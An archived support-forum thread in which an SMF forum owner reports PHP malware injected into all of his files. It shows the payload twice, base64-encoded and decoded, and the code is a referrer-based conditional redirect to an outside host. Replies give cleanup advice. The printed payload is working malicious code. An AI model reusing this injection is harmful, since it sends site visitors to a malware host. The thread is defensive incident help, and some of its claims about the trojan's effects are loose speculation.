Simple Machines Community Forum

SMF Support => SMF 2.0.x Support => Topic started by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 01:08:46 AM

Title: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 01:08:46 AM
All my files in the server/host is infected by something I would like to think this as a virus. I know this could be the server/host problem and have contacted them. Still awaiting their reply on this.

This code was injected to all my SMF files:

Code: [Select]
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZG5zLWRucy5kbnMtZG5zLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

What can cause such an injection to all SMF files? How to stop it? Please advise.
Title: Re: All files been infected by virus?
Post by: Colin on October 12, 2012, 01:15:45 AM
Sorry to hear that. Take a look at just a few:

http://www.simplemachines.org/community/index.php?topic=480455.0
http://www.simplemachines.org/community/index.php?topic=480600.0
http://www.simplemachines.org/community/index.php?topic=469001.0

Here are the docs:
http://wiki.simplemachines.org/smf/How_to_check_permissions
http://wiki.simplemachines.org/smf/How_do_I_make_my_forum_safer_against_hacker_attacks


Here is the code that is being injected:
Code: [Select]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dns-dns.dns-dns.com/");
exit();
}
}
}
}
}
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 01:26:29 AM
Check out following:

* http://sitecheck.sucuri.net/results/ahrasis.com/
* http://labs.sucuri.net/db/malware/malware-entry-mwblacklisted35
* http://blog.sucuri.net/2012/03/conditional-redirect-malware-decoded-evalbase64_decode-example.html

I think you need to clean this type of malware manually. If you have clean backup file, then restore your forum using that.

Also,

1. Change FTP/cPanel/WHM Passwords
2. Check your .htaccess file for malicious codes
2. Scan your PC
3. Open a support ticket with your webhost and ask them whether they can do anything about this. Sometimes, because of weak server security configuration, the attacker gains access and infects many websites.

Hope everything is going to be fine soon :)
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 01:38:13 AM
Here is the code that is being injected:
Code: [Select]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dns-dns.dns-dns.com/");
exit();
}
}
}
}
}

Very Nice (http://www.katzy.dsl.pipex.com/Smileys/c014.gif)

Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 01:50:56 AM
The site downloads Trojan program: HEUR:Trojan.Script.Iframer

The malware directly goes to browser cache folder and this way it infects the machine
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 02:24:57 AM
I will make a more thorough check. Right now, all I know that it has infected or has been injected in almost all files on server/host. My password was rather long and tightly/highly secured. Some claims it is a vulnerability in the software which is only SMF and few mods (not more than 15). This was not there since yesterday. So, there is no possibility any of this mod could have been the cause.

On whether the browser if infected with virus can cause all these, I would say it could be. But the browser I am using is FF15 and Chrome 22.0.1229.94 which is the latest. Could this be caused by firebug with all the available options (including the alpha and beta) installed?
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 02:49:56 AM

On whether the browser if infected with virus can cause all these, I would say it could be. But the browser I am using is FF15 and Chrome 22.0.1229.94 which is the latest. Could this be caused by firebug with all the available options (including the alpha and beta) installed?

Have you scanned all your machines using which you do all types of Admin work for your forum?

Try scanning your full PC with Kaspersky and Malware Bytes Anti-malware, with latest definitions. If the malware has blocked security softwares from performing tasks, then you need to use Kaspersky Rescue Disk.

Some properties of above trojan are as follows:

Quote
Slow down your PC speed notably.
Add other dangerous Trojan or Spyware to your system secretly.
Allow the hacker to access your entire system.
Collect all your personal information and transfer to a remote hacker.
Destroy critical system files and make PC unstable.

No matter, how strong your password was, you need to change it
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 02:54:10 AM
Have you scanned all your machines using which you do all types of Admin work for your forum?
Am doing it as we speak.
No matter, how strong your password was, you need to change it
I am changing that too. Will schedule to do that every month from now on.

So far I have clean most of the files on my server/host. Just have to double check to make sure they are all clean. I guess the attack come from one of my Joomla site. Sigh...
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 03:00:41 AM
One very important thing:

Disable your forum unless everything is sorted.

That referral based malware will be downloaded to every computer of your visitor. The malware directly goes to Browser Cache

I also got infected while testing for malware on your website

You need to make your forum Offline

Sorry, but it's necessary!
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 03:05:43 AM
That's a good idea. But I believe my server/host has restored all the clean files back to their places.
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 03:13:19 AM
That's a good idea. But I believe my server/host has restored all the clean files back to their places.

(http://www.katzy.dsl.pipex.com/Smileys/c014.gif)

As of now, I am also scanning my PC once again :(

Damn!

Edit:

I use Chrome and the malware was present in this folder: C:\Users\Mrinmay\AppData\Local\Google\Chrome\User Data\Default\
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 03:18:14 AM
Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.
Title: Re: All files been infected by virus?
Post by: mrintech on October 12, 2012, 03:25:31 AM
Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.

(http://www.katzy.dsl.pipex.com/Smileys/c014.gif)

No worries, I know how to deal with malwares on my PC. It takes 3-4 Hours to scan my PC as I have lots and lots of files and this annoys me the most.

Hope everything is fine with your websites too :)
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 12, 2012, 03:29:39 AM
They seem fine, for now I was wrong. I'm still facing this problem.  :-[
Title: Re: All files been infected by virus?
Post by: kat on October 12, 2012, 06:48:19 AM
This is a damned good thread, about this:

http://wordpress.org/support/topic/evalbase64_decode-hacked

I have to admit that, if I was in your place (I was, quite a while back), I might be tempted to replace all of the files with virgin files from the large upgrade archive.

(When I did mine, I went through ever file, manually, removing the code. Defining a macro sped that up, a lot)

But, as you intimated, your Wordpress files could be infected, too.
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 14, 2012, 12:22:12 PM
I only got Joomla & SMF. It is easy for me to deal with SMF. I have various ways of doing it. But I got problem with Joomla. I am planning to separate Joomla into different host/server in the future. One host one software. Easy to find which one is hacked / compromised in the future. Having said that, hmmm... I will wait and see the full report later.
Title: Re: All files been infected by virus?
Post by: kat on October 14, 2012, 03:46:14 PM
Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit. (http://www.katzy.dsl.pipex.com/Smileys/blush2.gif)

Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 15, 2012, 11:14:54 PM
Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit. (http://www.katzy.dsl.pipex.com/Smileys/blush2.gif)
Ah... It's nothing. I just finished reinstalling all backups. Site should be ok now...
Title: Re: All files been infected by virus?
Post by: XHIBIT911 on October 16, 2012, 01:37:32 AM
yup..I see youve fallen prey to the black hole exploit as well. Thats a nasty virus if Ive ever seen one and it hides in dbase code
Title: Re: All files been infected by virus?
Post by: mrintech on October 16, 2012, 01:46:25 AM
I can see your site is now clean: http://sitecheck.sucuri.net/results/ahrasis.com/

(http://www.katzy.dsl.pipex.com/Smileys/c014.gif)
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 16, 2012, 02:33:01 AM
Thanks. That site is good in detecting virus. But I still am puzzled actually.

One of my site under sch.my - Malaysia School Domain project site, I deleted all files and reinstall. But then, I still got a problem in logging in. When I scanned, it says:

Sitecheck Results

web site:    alumni.sch.my
status:    Site with warnings
web trust:          Not Blacklisted

Security warning in the URL:
http://alumni.sch.my/index.php?PHPSESSID=ktmen54tridjrrbbsp568ln0m7&action=register

So the virus is still there. Somewhere, somehow. It couldn't be inside my PC as I have made a full scanned before I proceed. Any ideas / suggestions?
Title: Re: All files been infected by virus?
Post by: mrintech on October 16, 2012, 02:47:43 AM
I don't see any warning status: http://sitecheck.sucuri.net/results/alumni.sch.my and http://sitecheck.sucuri.net/results/sch.my

Sometimes the results are cached on that site, you need to re-scan the site after some hours
Title: Re: All files been infected by virus?
Post by: Hj Ahmad Rasyid Hj Ismail on October 16, 2012, 03:28:15 AM
That is because i remove all its files. I am restoring from a fresh SMF files now.